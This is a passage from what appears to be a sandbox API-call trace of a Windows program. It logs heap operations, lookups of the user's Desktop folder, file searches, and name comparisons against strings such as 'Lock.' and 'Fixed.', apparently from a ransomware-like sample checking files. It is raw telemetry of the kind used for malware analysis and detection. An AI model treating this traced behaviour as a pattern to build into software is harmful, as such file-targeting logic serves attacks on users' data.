out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0165.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0165.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c948 [0165.986] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/GyHm6iovQDw.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyHm6iovQDw.m4a", lpFilePart=0x8bf658*="GyHm6iovQDw.m4a") returned 0x35 [0165.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0165.987] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyHm6iovQDw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyhm6iovqdw.m4a")) returned 0xffffffff [0165.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.987] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0165.987] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.987] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0165.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0165.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jrgF.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rgF.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gF.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.988] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0165.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jrgF.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rgF.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gF.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.989] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0165.989] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0165.989] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0165.989] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0165.989] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0165.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.990] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0165.990] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.990] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0165.990] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.990] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.990] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.990] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.991] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.991] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/jrgF.gif", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ad0880, ftCreationTime.dwHighDateTime=0x1d4ccc4, ftLastAccessTime.dwLowDateTime=0xf67e7bc0, ftLastAccessTime.dwHighDateTime=0x1d4d53e, ftLastWriteTime.dwLowDateTime=0xf67e7bc0, ftLastWriteTime.dwHighDateTime=0x1d4d53e, nFileSizeHigh=0x0, nFileSizeLow=0x130fe, dwReserved0=0x9d70006, dwReserved1=0xe8b8, cFileName="jrgF.gif", cAlternateFileName="")) returned 0xaa56a0 [0165.991] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0165.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.991] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.993] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0165.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.993] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0165.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0165.993] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0165.994] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.994] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.994] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0165.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0165.994] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.995] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0165.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0165.995] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0165.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 